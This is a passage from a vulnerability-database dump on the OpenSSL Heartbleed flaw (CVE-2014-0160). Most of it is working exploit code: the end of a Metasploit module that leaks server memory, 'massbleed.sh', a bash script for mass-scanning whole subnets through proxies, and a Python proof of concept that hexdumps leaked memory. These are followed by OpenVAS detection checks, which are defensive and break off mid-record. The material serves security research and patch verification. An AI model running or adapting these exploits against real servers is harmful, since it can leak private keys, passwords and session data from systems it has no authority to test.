:tls_smtp, \n'IMAP' => :tls_imap, \n'JABBER' => :tls_jabber, \n'POP3' => :tls_pop3 \n} \n \ndef initialize \nsuper( \n'Name' => 'OpenSSL Heartbeat (Heartbleed) Information Leak', \n'Description' => %q{ \nThis module implements the OpenSSL Heartbleed attack. The problem \nexists in the handling of heartbeat requests, where a fake length can \nbe used to leak memory data in the response. Services that support \nSTARTTLS may also be vulnerable. \n}, \n'Author' => [ \n'Neel Mehta', # Vulnerability discovery \n'Riku', # Vulnerability discovery \n'Antti', # Vulnerability discovery \n'Matti', # Vulnerability discovery \n'Jared Stafford <jspenguin[at]jspenguin.org>', # Original Proof of Concept. This module is based on it. \n'FiloSottile', # PoC site and tool \n'Christian Mehlmauer', # Msf module \n'wvu', # Msf module \n'juan vazquez' # Msf module \n], \n'References' => \n[ \n['CVE', '2014-0160'], \n['US-CERT-VU', '720951'], \n['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A'], \n['URL', 'http://heartbleed.com/'], \n['URL', 'https://github.com/FiloSottile/Heartbleed'], \n['URL', 'https://gist.github.com/takeshixx/10107280'], \n['URL', 'http://filippo.io/Heartbleed/'] \n], \n'DisclosureDate' => 'Apr 7 2014', \n'License' => MSF_LICENSE \n) \n \nregister_options( \n[ \nOpt::RPORT(443), \nOptEnum.new('STARTTLS', [true, 'Protocol to use with STARTTLS, None to avoid STARTTLS ', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3' ]]), \nOptEnum.new('TLSVERSION', [true, 'TLS version to use', '1.0', ['1.0', '1.1', '1.2']]) \n], self.class) \n \nregister_advanced_options( \n[ \nOptString.new('XMPPDOMAIN', [ true, 'The XMPP Domain to use when Jabber is selected', 'localhost' ]) \n], self.class) \n \nend \n \ndef peer \n\"#{rhost}:#{rport}\" \nend \n \ndef tls_smtp \n# https://tools.ietf.org/html/rfc3207 \nsock.get_once \nsock.put(\"EHLO #{Rex::Text.rand_text_alpha(10)}\\n\") \nres = sock.get_once \n \nunless res && res =~ /STARTTLS/ \nreturn nil \nend \nsock.put(\"STARTTLS\\n\") 
\nsock.get_once \nend \n \ndef tls_imap \n# http://tools.ietf.org/html/rfc2595 \nsock.get_once \nsock.put(\"a001 CAPABILITY\\r\\n\") \nres = sock.get_once \nunless res && res =~ /STARTTLS/i \nreturn nil \nend \nsock.put(\"a002 STARTTLS\\r\\n\") \nsock.get_once \nend \n \ndef tls_pop3 \n# http://tools.ietf.org/html/rfc2595 \nsock.get_once \nsock.put(\"CAPA\\r\\n\") \nres = sock.get_once \nif res.nil? || res =~ /^-/ || res !~ /STLS/ \nreturn nil \nend \nsock.put(\"STLS\\r\\n\") \nres = sock.get_once \nif res.nil? || res =~ /^-/ \nreturn nil \nend \nres \nend \n \ndef tls_jabber \n# http://xmpp.org/extensions/xep-0035.html \nmsg = \"<?xml version='1.0' ?>\" \nmsg << \"<stream:stream xmlns='jabber:client' \" \nmsg << \"xmlns:stream='http://etherx.jabber.org/streams' \" \nmsg << \"version='1.0' \" \nmsg << \"to='#{datastore['XMPPDOMAIN']}'>\" \nsock.put(msg) \nres = sock.get \nif res.nil? || res =~ /stream:error/ || res !~ /starttls/i \nprint_error(\"#{peer} - Jabber host unknown. Please try changing the XMPPDOMAIN option.\") if res && res =~ /<host-unknown/ \nreturn nil \nend \nmsg = \"<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\" \nsock.put(msg) \nsock.get_once \nend \n \ndef run_host(ip) \nconnect \n \nunless datastore['STARTTLS'] == 'None' \nvprint_status(\"#{peer} - Trying to start SSL via #{datastore['STARTTLS']}\") \nres = self.send(TTLS_CALLBACKS[datastore['STARTTLS']]) \nif res.nil? \nvprint_error(\"#{peer} - STARTTLS failed...\") \nreturn \nend \nend \n \nvprint_status(\"#{peer} - Sending Client Hello...\") \nsock.put(client_hello) \n \nserver_hello = sock.get \nunless server_hello.unpack(\"C\").first == HANDSHAKE_RECORD_TYPE \nvprint_error(\"#{peer} - Server Hello Not Found\") \nreturn \nend \n \nvprint_status(\"#{peer} - Sending Heartbeat...\") \nheartbeat_length = 16384 \nsock.put(heartbeat(heartbeat_length)) \nhdr = sock.get_once(5) \nif hdr.blank? 
\nvprint_error(\"#{peer} - No Heartbeat response...\") \nreturn \nend \n \nunpacked = hdr.unpack('Cnn') \ntype = unpacked[0] \nversion = unpacked[1] # must match the type from client_hello \nlen = unpacked[2] \n \n# try to get the TLS error \nif type == ALERT_RECORD_TYPE \nres = sock.get_once(len) \nalert_unp = res.unpack('CC') \nalert_level = alert_unp[0] \nalert_desc = alert_unp[1] \nmsg = \"Unknown error\" \n# http://tools.ietf.org/html/rfc5246#section-7.2 \ncase alert_desc \nwhen 0x46 \nmsg = \"Protocol error. Looks like the chosen protocol is not supported.\" \nend \nprint_error(\"#{peer} - #{msg}\") \ndisconnect \nreturn \nend \n \nunless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[datastore['TLSVERSION']] \nvprint_error(\"#{peer} - Unexpected Heartbeat response\") \ndisconnect \nreturn \nend \n \nvprint_status(\"#{peer} - Heartbeat response, checking if there is data leaked...\") \nheartbeat_data = sock.get_once(heartbeat_length) # Read the magic length... \nif heartbeat_data \nprint_good(\"#{peer} - Heartbeat response with leak\") \nreport_vuln({ \n:host => rhost, \n:port => rport, \n:name => self.name, \n:refs => self.references, \n:info => \"Module #{self.fullname} successfully leaked info\" \n}) \nvprint_status(\"#{peer} - Printable info leaked: #{heartbeat_data.gsub(/[^[:print:]]/, '')}\") \nelse \nvprint_error(\"#{peer} - Looks like there isn't leaked information...\") \nend \nend \n \ndef heartbeat(length) \npayload = \"\\x01\" # Heartbeat Message Type: Request (1) \npayload << [length].pack(\"n\") # Payload Length: 16384 \n \nssl_record(HEARTBEAT_RECORD_TYPE, payload) \nend \n \ndef client_hello \n# Use current day for TLS time \ntime_temp = Time.now \ntime_epoch = Time.mktime(time_temp.year, time_temp.month, time_temp.day, 0, 0).to_i \n \nhello_data = [TLS_VERSION[datastore['TLSVERSION']]].pack(\"n\") # Version TLS \nhello_data << [time_epoch].pack(\"N\") # Time in epoch format \nhello_data << Rex::Text.rand_text(28) # Random 
\nhello_data << \"\\x00\" # Session ID length \nhello_data << [CIPHER_SUITES.length * 2].pack(\"n\") # Cipher Suites length (102) \nhello_data << CIPHER_SUITES.pack(\"n*\") # Cipher Suites \nhello_data << \"\\x01\" # Compression methods length (1) \nhello_data << \"\\x00\" # Compression methods: null \n \nhello_data_extensions = \"\\x00\\x0f\" # Extension type (Heartbeat) \nhello_data_extensions << \"\\x00\\x01\" # Extension length \nhello_data_extensions << \"\\x01\" # Extension data \n \nhello_data << [hello_data_extensions.length].pack(\"n\") \nhello_data << hello_data_extensions \n \ndata = \"\\x01\\x00\" # Handshake Type: Client Hello (1) \ndata << [hello_data.length].pack(\"n\") # Length \ndata << hello_data \n \nssl_record(HANDSHAKE_RECORD_TYPE, data) \nend \n \ndef ssl_record(type, data) \nrecord = [type, TLS_VERSION[datastore['TLSVERSION']], data.length].pack('Cnn') \nrecord << data \nend \nend \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126101/openssl_heartbleed.rb.txt"}, {"lastseen": "2016-12-05T22:12:31", "description": "", "published": "2014-04-23T00:00:00", "type": "packetstorm", "title": "Mass Bleed 20140423", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-23T00:00:00", "id": "PACKETSTORM:126288", "href": "https://packetstormsecurity.com/files/126288/Mass-Bleed-20140423.html", "sourceData": "`#!/bin/bash \n# massbleed.sh 20140423 by 1N3 \n# http://treadstonesecurity.blogspot.ca \n# Usage: sh massbleed.sh <CIDR|IP> <single|port|subnet> [port] [proxy] \n# \n# This script has four main functions with the ability to proxy all connections: \n# 1. To mass scan any CIDR range for HeartBleed via port 443/tcp (https) (example: sh massbleed.sh 192.168.0.0/16) \n# 2. To scan any CIDR range for HeartBleed via any custom port specified (example: sh massbleed.sh 192.168.0.0/16 port 8443) \n# 3. 
To individual scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh 127.0.0.1 single) \n# 4. To scan every open port on every host in a single class C subnet for HeartBleed (example: sh massbleed.sh 192.168.0. subnet) \n# \n# PROXY: A proxy option has been added to scan and run the scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work. \n# USAGE EXAMPLES: \n# (example: sh massbleed.sh 192.168.0.0/16 0 0 proxy) \n# (example: sh massbleed.sh 192.168.0.0/16 port 8443 proxy) \n# (example: sh massbleed.sh 127.0.0.1 single 0 proxy) \n# (example: sh massbleed.sh 192.168.0. subnet 0 proxy) \n# \n# Prerequisites: \n# Is the heartbleed POC present? \n# Is unicornscan installed? \n# Is nmap installed? \n \necho \"(--==== http://treadstonesecurity.blogspot.ca\" \necho \"(--==== massbleed.sh 20140423 by 1N3\" \necho \"\" \n \nHEARTBLEED=`ls heartbleed.py` \nUNICORNSCAN=`which unicornscan` \nNMAP=`which nmap` \nRANGE=$1 \nALL_PORTS=$2 \nCUSTOM_PORT=$3 \nPROXY=$4 \nPORT_RANGE=\"1-65000\" \n \nif [ \"$HEARTBLEED\" != \"heartbleed.py\" ]; then \necho \"(--==== heartbleed.py not found!\" \necho \"(--==== To fix, download the POC by Jared Stafford and place in same directory named: heartbleed.py\" \nexit \nfi \n \nif [ \"$UNICORNSCAN\" == \"\" ]; then \necho \"(--==== unicornscan not installed! Exiting...\" \nexit \nfi \n \nif [ \"$NMAP\" == \"\" ]; then \necho \"(--==== nmap not installed! 
Exiting...\" \nexit \nfi \n \nif [ -z \"$1\" ]; then \necho \"(--==== usage: $0 <CIDR|IP> <single|port|subnet> [port] [proxy]\" \nexit \nfi \n \nif [ \"$PROXY\" = \"proxy\" ]; then \necho \"(--==== scanning via proxy...\" \nif [ \"$ALL_PORTS\" = \"single\" ]; then \nif [ \"$CUSTOM_PORT\" != \"0\" ]; then \necho \"(--==== Checking $RANGE:$CUSTOM_PORT\" && proxychains python heartbleed.py $RANGE -p $CUSTOM_PORT | grep Server 2> /dev/null \nelse \nfor a in `proxychains unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`; \ndo echo \"(--==== Checking $RANGE:\"$a && proxychains python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null; \ndone; \nfi \nfi \nif [ \"$ALL_PORTS\" = \"subnet\" ]; then \nfor a in {1..254}; \ndo \necho \"Scanning: $RANGE$a\" \nfor b in `proxychains unicornscan \"$RANGE$a\" -mT -r500 | awk '{print $4}' | cut -d']' -f1`; \ndo \necho \"$RANGE$a:$b\" \nproxychains python heartbleed.py $RANGE$a -p $b | grep Server; \ndone; \ndone; \nfi \nif [ \"$ALL_PORTS\" = \"port\" ]; then \nfor a in `proxychains unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`; \ndo echo \"(--==== Checking:\" $a:$CUSTOM_PORT&& proxychains python heartbleed.py $a -p $CUSTOM_PORT | grep Server; \ndone; \nelse \nfor a in `proxychains unicornscan $RANGE -p 443 | awk '{print $6}'`; \ndo echo \"(--==== Checking:\" $a && proxychains python heartbleed.py $a -p 443 | grep Server; \ndone \nfi \nelse \nif [ \"$ALL_PORTS\" = \"single\" ]; then \nfor a in `unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`; \ndo echo \"(--==== Checking $RANGE:\"$a && python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null; \ndone; \nfi \nif [ \"$ALL_PORTS\" = \"subnet\" ]; then \nfor a in {1..254}; \ndo \necho \"Scanning: $RANGE$a\" \nfor b in `unicornscan \"$RANGE$a\" -mT -r500 | awk '{print $4}' | cut -d']' -f1`; \ndo \necho \"$RANGE$a:$b\" \npython heartbleed.py $RANGE$a -p $b | grep Server; \ndone; \ndone; \nfi \nif [ \"$ALL_PORTS\" = \"port\" ]; then 
\nfor a in `unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`; \ndo echo \"(--==== Checking:\" $a:$CUSTOM_PORT&& python heartbleed.py $a -p $CUSTOM_PORT | grep Server; \ndone; \nelse \nfor a in `unicornscan $RANGE -p 443 | awk '{print $6}'`; \ndo echo \"(--==== Checking:\" $a && python heartbleed.py $a -p 443 | grep Server; \ndone \nfi \nfi \n \necho \"(--==== scan complete!\" \nexit \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126288/massbleed.sh.txt"}, {"lastseen": "2016-12-05T22:11:38", "description": "", "published": "2014-04-09T00:00:00", "type": "packetstorm", "title": "TLS Heartbeat Proof Of Concept", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "PACKETSTORM:126072", "href": "https://packetstormsecurity.com/files/126072/TLS-Heartbeat-Proof-Of-Concept.html", "sourceData": "`#!/usr/bin/env python \n \n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) \n# The author disclaims copyright to this source code. 
\n# Modified by Csaba Fitzl for multiple SSL / TLS version support \n \nimport sys \nimport struct \nimport socket \nimport time \nimport select \nimport re \nfrom optparse import OptionParser \n \noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') \noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') \n \ndef h2bin(x): \nreturn x.replace(' ', '').replace('\\n', '').decode('hex') \n \nversion = [] \nversion.append(['SSL 3.0','03 00']) \nversion.append(['TLS 1.0','03 01']) \nversion.append(['TLS 1.1','03 02']) \nversion.append(['TLS 1.2','03 03']) \n \ndef create_hello(version): \nhello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53 \n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf \nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 \n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 \n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c \nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 \nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 \nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c \nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 \n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 \n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 \n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 \n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 \n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 \n00 0f 00 01 01 \n''') \nreturn hello \n \ndef create_hb(version): \nhb = h2bin('18 ' + version + ' 00 03 01 40 00') \nreturn hb \n \ndef hexdump(s): \nfor b in xrange(0, len(s), 16): \nlin = [c for c in s[b : b + 16]] \nhxdat = ' '.join('%02X' % ord(c) for c in lin) \npdat = ''.join((c if 32 <= ord(c) <= 126 else '.' 
)for c in lin) \nprint ' %04x: %-48s %s' % (b, hxdat, pdat) \nprint \n \ndef recvall(s, length, timeout=5): \nendtime = time.time() + timeout \nrdata = '' \nremain = length \nwhile remain > 0: \nrtime = endtime - time.time() \nif rtime < 0: \nreturn None \nr, w, e = select.select([s], [], [], 5) \nif s in r: \ndata = s.recv(remain) \n# EOF? \nif not data: \nreturn None \nrdata += data \nremain -= len(data) \nreturn rdata \n \n \ndef recvmsg(s): \nhdr = recvall(s, 5) \nif hdr is None: \nprint 'Unexpected EOF receiving record header - server closed connection' \nreturn None, None, None \ntyp, ver, ln = struct.unpack('>BHH', hdr) \npay = recvall(s, ln, 10) \nif pay is None: \nprint 'Unexpected EOF receiving record payload - server closed connection' \nreturn None, None, None \nprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) \nreturn typ, ver, pay \n \ndef hit_hb(s,hb): \ns.send(hb) \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ is None: \nprint 'No heartbeat response received, server likely not vulnerable' \nreturn False \n \nif typ == 24: \nprint 'Received heartbeat response:' \nhexdump(pay) \nif len(pay) > 3: \nprint 'WARNING: server returned more data than it should - server is vulnerable!' \nelse: \nprint 'Server processed malformed heartbeat, but did not return any extra data.' \nreturn True \n \nif typ == 21: \nprint 'Received alert:' \nhexdump(pay) \nprint 'Server returned error, likely not vulnerable' \nreturn False \n \ndef main(): \nopts, args = options.parse_args() \nif len(args) < 1: \noptions.print_help() \nreturn \nfor i in range(len(version)): \nprint 'Trying ' + version[i][0] + '...' \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nprint 'Connecting...' \nsys.stdout.flush() \ns.connect((args[0], opts.port)) \nprint 'Sending Client Hello...' \nsys.stdout.flush() \ns.send(create_hello(version[i][1])) \nprint 'Waiting for Server Hello...' 
\nsys.stdout.flush() \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ == None: \nprint 'Server closed connection without sending Server Hello.' \nreturn \n# Look for server hello done message. \nif typ == 22 and ord(pay[0]) == 0x0E: \nbreak \n \nprint 'Sending heartbeat request...' \nsys.stdout.flush() \ns.send(create_hb(version[i][1])) \nif hit_hb(s,create_hb(version[i][1])): \n#Stop if vulnerable \nbreak \n \nif __name__ == '__main__': \nmain() \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126072/heartbeat2.py.txt"}], "openvas": [{"lastseen": "2019-05-29T18:36:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "description": "Oracle Linux Local Security Checks ELSA-2014-0376", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123430", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123430", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-0376", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-0376.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123430\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:03:43 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-0376\");\n script_tag(name:\"insight\", value:\"ELSA-2014-0376 - openssl security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-0376\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-0376.html\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~16.el6_5.7\", 
rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.1e~16.el6_5.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~1.0.1e~16.el6_5.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openssl-static\", rpm:\"openssl-static~1.0.1e~16.el6_5.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:37:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "description": "The remote host is missing an update for the 'openssl'\n package(s) announced via the referenced advisory.", "modified": "2018-11-23T00:00:00", "published": "2014-04-08T00:00:00", "id": "OPENVAS:1361412562310871154", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871154", "type": "openvas", "title": "RedHat Update for openssl RHSA-2014:0376-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openssl RHSA-2014:0376-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871154\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-08 12:13:57 +0530 (Tue, 08 Apr 2014)\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"RedHat Update for openssl RHSA-2014:0376-01\");\n\n\n script_tag(name:\"affected\", value:\"openssl on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"insight\", value:\"OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. 
(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"RHSA\", value:\"2014:0376-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2014-April/msg00017.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n 
exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-07T16:39:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "description": "OpenSSL is prone to an information disclosure vulnerability.\n\n This NVT has been merged into the NVT 'OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability' (OID: 1.3.6.1.4.1.25623.1.0.103936).", "modified": "2020-04-02T00:00:00", "published": "2014-04-09T00:00:00", "id": "OPENVAS:1361412562310105010", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105010", "type": "openvas", "title": "OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability (STARTTLS Check)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability STARTTLS Check\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105010\");\n script_version(\"2020-04-02T11:36:28+0000\");\n script_bugtraq_id(66690);\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-04-02 11:36:28 +0000 (Thu, 02 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-04-09 09:54:09 +0200 (Wed, 09 Apr 2014)\");\n script_name(\"OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability (STARTTLS Check)\");\n script_category(ACT_ATTACK);\n script_family(\"General\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/66690\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to gain access to sensitive\n information that may aid in further attacks.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a special crafted TLS request and check the response.\");\n\n script_tag(name:\"insight\", value:\"The TLS and DTLS implementations do not properly handle\n Heartbeat Extension packets.\");\n\n script_tag(name:\"solution\", value:\"Updates are available.\");\n\n script_tag(name:\"summary\", value:\"OpenSSL is prone to an information disclosure vulnerability.\n\n This NVT has been merged into the NVT 'OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability' (OID: 1.3.6.1.4.1.25623.1.0.103936).\");\n\n script_tag(name:\"affected\", value:\"OpenSSL 1.0.1f, 1.0.1e, 1.0.1d, 1.0.1c, 1.0.1b, 1.0.1a, and\n 1.0.1 
